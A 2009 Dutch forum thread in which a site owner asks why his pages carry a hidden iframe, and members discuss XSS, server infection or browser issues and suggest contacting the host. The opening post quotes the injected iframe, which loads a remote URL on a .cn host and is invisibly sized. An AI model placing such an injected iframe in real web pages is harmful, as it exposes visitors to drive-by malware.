login  Naam:   Wachtwoord: 
Registreer je!
 Forum

virussen (Opgelost)

Offline vbdesign - 19/06/2009 12:47
Avatar van vbdesignLid Beste,

Als ik naar mijn sites wilt gaan krijg ik een virus namelijk:

<iframe src="http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi72" width=125 height=125 style="visibility: hidden"></iframe>

Weet iemand wat dit kan zijn ?

Groetjes Bert

15 antwoorden

Gesponsorde links
Offline ArieMedia - 19/06/2009 12:50
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
Weet iemand wat dit kan zijn ?

Dit is een Iframe gecreëerd door een fout in de beveiliging

Duidelijk antwoord he? 
Offline vbdesign - 19/06/2009 12:50
Avatar van vbdesign Lid En weet je ook hoe dit beter beveiligd kan worden dan ?

Groetjes Bert
Offline ArieMedia - 19/06/2009 12:53
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
vbdesign schreef:
En weet je ook hoe dit beter beveiligd kan worden dan ?

Groetjes Bert
Als ik jou zeg dat ik ineens een vreemde javascript heb in mijn broncode kan jij toch ook niet gokken waar beveiligingsfout zit?

Gebruik je PHP of andere script-taal.. Heb je een upload-script?
Kortom.. waar denk jij dat bij jou de fout kan ontstaan.
Offline Koen - 19/06/2009 13:02
Avatar van Koen PHP expert
Arie2Zero schreef:
Weet iemand wat dit kan zijn ?

Dit is een Iframe gecreëerd door een fout in de beveiliging

Duidelijk antwoord he? 


Dit is niet noodzakelijk het gevolg van een XSS aanval. Het is goed mogelijk dat de server waarop de betreffende website gehost staat, dat deze geïnfecteerd is door kwaadwillende software.
Offline ArieMedia - 19/06/2009 13:12
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
Koen schreef:
[..quote..]

Dit is niet noodzakelijk het gevolg van een XSS aanval. Het is goed mogelijk dat de server waarop de betreffende website gehost staat, dat deze geïnfecteerd is door kwaadwillende software.
Dat KAN ja. Maar ik vind dat dit "weer zo'n" topic is waar niet duidelijk word beschreven wat allemaal de oorzaken kunnen zijn. Als ik jou vertel dat ik ineens een vreemde javascript in mijn code heb staan dan kan jij er toch ook niks mee?
Offline Martijn - 19/06/2009 13:37
Avatar van Martijn Crew PHP je kan er ook op een normale toon op reageren. Als jij ergens komt in de hoop voor hulp, kun je ook wel eens dingen vergeten te vermelden. Zou jij dan willen worden afgezeikt of zou je een normale vraag voor meer informatie willen?
Offline ArieMedia - 19/06/2009 13:48
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
DeviourSoul schreef:
je kan er ook op een normale toon op reageren. Als jij ergens komt in de hoop voor hulp, kun je ook wel eens dingen vergeten te vermelden. Zou jij dan willen worden afgezeikt of zou je een normale vraag voor meer informatie willen?
Ik geef in eerste instantie toch ook gewoon antwoord op zijn vraag... Ik geef alleen ook aan dat er weinig info word gegeven.
Maargoed ik ga die discussie iniedergeval niet op het forum aan, daar lijkt mij het forum niet voor.
Offline Kevin - 19/06/2009 13:51
Avatar van Kevin Crew Ajax/REST @Bert: meldt dit best even aan het bedrijf waar je site gehost wordt?
Offline Ontani - 19/06/2009 13:51
Avatar van Ontani Gouden medailleGouden medailleGouden medailleGouden medaille

-1
't is maar dat forum een afkorting is van discussieforum
Offline vbdesign - 19/06/2009 14:11
Avatar van vbdesign Lid
Citaat:
@Bert: meldt dit best even aan het bedrijf waar je site gehost wordt?


Het is een reseller, heb inderdaad het bedrijf gemaild nu.
Maar het raarste is dat niet alle sites op deze reseller door deze virus is getroffen, kan dat zijn ?

Offline Koen - 20/06/2009 23:44
Avatar van Koen PHP expert Is je site dynamisch en kan er inhoud van de gebruiker uit worden geinjecteerd in je website mbv een database bijvoorbeeld?
Google.be: xss injection
Offline vinTage - 21/06/2009 02:33
Avatar van vinTage Nieuw lid of neem een degelijke host ? 
Offline MiST - 04/09/2009 01:30
Avatar van MiST Lid zeker dat je niets lokaal hebt? een vriendin van mij had iets dat een extra frame maakte in IE en bij elke page load hoger en dus groter werd. bijna heel haar scherm wit...
Offline Stijn - 04/09/2009 07:30
Avatar van Stijn PHP expert Om MiST zijn antwoord volledig te maken: geef eens de link van je website .
Offline kickasgamer - 06/09/2009 10:54
Avatar van kickasgamer PHP ver gevorderde
MiST schreef:
zeker dat je niets lokaal hebt? een vriendin van mij had iets dat een extra frame maakte in IE en bij elke page load hoger en dus groter werd. bijna heel haar scherm wit...


een vriendin van mij had hetzelfde probleem en het lag daar aan de google toolbar, ik heb die uit IE gegooid en toen was het probleem opgelost ;)
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.209s